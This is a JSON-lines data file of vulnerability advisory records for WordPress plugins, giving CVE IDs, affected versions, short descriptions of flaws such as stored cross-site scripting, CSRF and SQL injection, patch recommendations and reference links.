{"CVE_ID":"CVE-2025-5336","slug":"click-to-chat-for-whatsapp","versionImpact":"4.22","description":"The Click to Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-no_number\u2019 parameter in all versions up to, and including, 4.22 to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L818\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L818\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/click-to-chat-for-whatsapp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/click-to-chat-for-whatsapp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83695ac4-a08b-4c25-ac33-d9b7498f5a2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83695ac4-a08b-4c25-ac33-d9b7498f5a2c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7648","slug":"ruven-themes-shortcodes","versionImpact":"1.0","description":"The Ruven Themes: Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ruven_button' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ruven-themes-shortcodes\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ruven-themes-shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1794ef89-3949-44b4-9d42-80cd827ef730?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1794ef89-3949-44b4-9d42-80cd827ef730?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4333","slug":"wp-statistics","versionImpact":"13.1.1","description":"The WP Statistics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 13.1.1. This is due to missing or incorrect nonce validation on the view() function. This makes it possible for unauthenticated attackers to activate and deactivate arbitrary plugins, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215937d9-739b-4198-b375-6d171bbac64a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215937d9-739b-4198-b375-6d171bbac64a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2626597%40wp-statistics&new=2626597%40wp-statistics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2626597%40wp-statistics&new=2626597%40wp-statistics&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1510","slug":"shortcodes-ultimate","versionImpact":"7.0.2","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_tooltip shortcode in all versions up to, and including, 7.0.2 due to insufficient input sanitization and output escaping on user supplied attributes and user supplied tags. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee03d780-076b-4501-a353-376198a4bd7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee03d780-076b-4501-a353-376198a4bd7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.0.2\\\/includes\\\/shortcodes\\\/tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.0.2\\\/includes\\\/shortcodes\\\/tooltip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037436\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037436\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/tooltip.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2126","slug":"themeisle-companion","versionImpact":"2.10.32","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046442\\\/themeisle-companion\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046442\\\/themeisle-companion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9125","slug":"king-ie","versionImpact":"1.0","description":"The king_IE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486f43cc-cc3f-4a63-b00f-86f29a391269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486f43cc-cc3f-4a63-b00f-86f29a391269?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/king-ie\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/king-ie\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5578","slug":"table-of-contents-plus","versionImpact":"2408","description":"The Table of Contents Plus WordPress plugin through 2408 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/641e4fc3-4214-4c2e-8245-15e9dcdd37b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/641e4fc3-4214-4c2e-8245-15e9dcdd37b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10177","slug":"beds24-online-booking","versionImpact":"2.0.26","description":"The Beds24 Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's beds24-link shortcode in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beds24-online-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beds24-online-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48332","slug":"wp-mail-bank","versionImpact":"4.0.14","description":"Missing Authorization vulnerability in Tech Banker Mail Bank - #1 Mail SMTP Plugin for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mail Bank - #1 Mail SMTP Plugin for WordPress: from n\/a through 4.0.14.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-mail-bank\\\/vulnerability\\\/wordpress-mail-bank-1-mail-smtp-plugin-for-wordpress-plugin-4-0-14-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-mail-bank\\\/vulnerability\\\/wordpress-mail-bank-1-mail-smtp-plugin-for-wordpress-plugin-4-0-14-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11774","slug":"outdooractive-embed","versionImpact":"1.5","description":"The Outdooractive Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'list2go' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/outdooractive-embed\\\/trunk\\\/shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/outdooractive-embed\\\/trunk\\\/shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/outdooractive-embed\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/outdooractive-embed\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d152271f-af5c-4faf-9945-483b69b716f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d152271f-af5c-4faf-9945-483b69b716f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13095","slug":"wp-triggers-lite","versionImpact":"2.5.3","description":"The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74e95fb5-025b-4d4d-a279-844b6ee3e57d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74e95fb5-025b-4d4d-a279-844b6ee3e57d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2279","slug":"robo-maps","versionImpact":"1.0.6","description":"The Maps  WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd87d7ba-86e9-45b6-a3cd-11f6486f0bd0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd87d7ba-86e9-45b6-a3cd-11f6486f0bd0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4279","slug":"external-image-replace","versionImpact":"1.0.8","description":"The External image replace plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'external_image_replace_get_posts::replace_post' function in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-image-replace\\\/tags\\\/1.0.8\\\/class.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-image-replace\\\/tags\\\/1.0.8\\\/class.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1624fd-d98b-4953-99dc-a952dda48aa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1624fd-d98b-4953-99dc-a952dda48aa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7196","slug":"ultimate-noindex-nofollow-tool","versionImpact":"1.1.2","description":"The Ultimate Noindex Nofollow Tool WordPress plugin through 1.1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15ea1ffd-5a0c-422c-8c9c-7b632516a156\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15ea1ffd-5a0c-422c-8c9c-7b632516a156\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4592","slug":"ai-image-generator-lab","versionImpact":"1.0.6","description":"The AI Image Lab \u2013 Free AI Image Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on the 'wpz-ai-images' page. This makes it possible for unauthenticated attackers to update the plugin's API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-generator-lab\\\/trunk\\\/includes\\\/admin\\\/admin-page.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-generator-lab\\\/trunk\\\/includes\\\/admin\\\/admin-page.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d56713-59af-4ad9-8744-6c6a5e5fe213?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d56713-59af-4ad9-8744-6c6a5e5fe213?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4838","slug":"simple-download-counter","versionImpact":"1.6","description":"The Simple Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'before' and 'after'. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5f7f2a-c7b7-4339-a608-51fd684c18bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5f7f2a-c7b7-4339-a608-51fd684c18bf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963794\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963794\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5583","slug":"wp-simple-galleries","versionImpact":"1.34","description":"The WP Simple Galleries plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.34 via deserialization of untrusted input from the 'wpsimplegallery_gallery' post meta via 'wpsgallery' shortcode. This allows authenticated attackers, with contributor-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc8f7cf-d8be-4229-b823-3bd9bc9f6eda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc8f7cf-d8be-4229-b823-3bd9bc9f6eda?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-galleries\\\/tags\\\/1.34\\\/wp-simple-gallery.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-galleries\\\/tags\\\/1.34\\\/wp-simple-gallery.php#L250\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1562","slug":"wc-gsheetconnector","versionImpact":"1.3.11","description":"The WooCommerce Google Sheet Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the execute_post_data function in all versions up to, and including, 1.3.11. This makes it possible for unauthenticated attackers to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2106","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.2.10","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10. This can allow unauthenticated attackers to extract sensitive data including all registered user's username and email addresses which can be used to help perform future attacks.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/route.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/route.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/classes\\\/models\\\/StmUser.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.8\\\/_core\\\/lms\\\/classes\\\/models\\\/StmUser.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045511\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.11\\\/_core\\\/lms\\\/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/route.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045511\\\/masterstudy-lms-learning-management-system\\\/tags\\\/3.2.11\\\/_core\\\/lms\\\/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/route.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4370","slug":"wpzoom-elementor-addons","versionImpact":"1.1.36","description":"The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget Image Box in all versions up to, and including, 1.1.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7aaff3e-0c81-4fe7-b162-569c517f6c49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7aaff3e-0c81-4fe7-b162-569c517f6c49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/widgets\\\/image-box\\\/image-box.php#L1229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-elementor-addons\\\/trunk\\\/includes\\\/widgets\\\/image-box\\\/image-box.php#L1229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084540\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9117","slug":"mapplic-lite","versionImpact":"1.0","description":"The Mapplic Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e1713-1a64-46dc-8b30-b53045b2e01d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a19e1713-1a64-46dc-8b30-b53045b2e01d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapplic-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapplic-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10922","slug":"featured-posts-scroll","versionImpact":"1.25","description":"The Featured Posts Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.25. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4196b8d1-23a7-4b90-8e6b-f51849d44f9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/featured-posts-scroll\\\/wordpress-featured-posts-scroll-plugin-1-25-csrf-to-stored-cross-site-scripting-xss-vulnerability\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/featured-posts-scroll\\\/wordpress-featured-posts-scroll-plugin-1-25-csrf-to-stored-cross-site-scripting-xss-vulnerability\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10172","slug":"void-visual-whmcs-element","versionImpact":"1.0.4","description":"The WPBakery Visual Composer WHMCS Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's void_wbwhmcse_laouts_search shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/void-visual-whmcs-element\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/void-visual-whmcs-element\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28168","slug":"wordpress-console","versionImpact":"0.3.9","description":"Missing Authorization vulnerability in Jerod Santo WordPress Console allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Console: from n\/a through 0.3.9.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-console\\\/vulnerability\\\/wordpress-wordpress-console-plugin-0-3-9-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-console\\\/vulnerability\\\/wordpress-wordpress-console-plugin-0-3-9-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
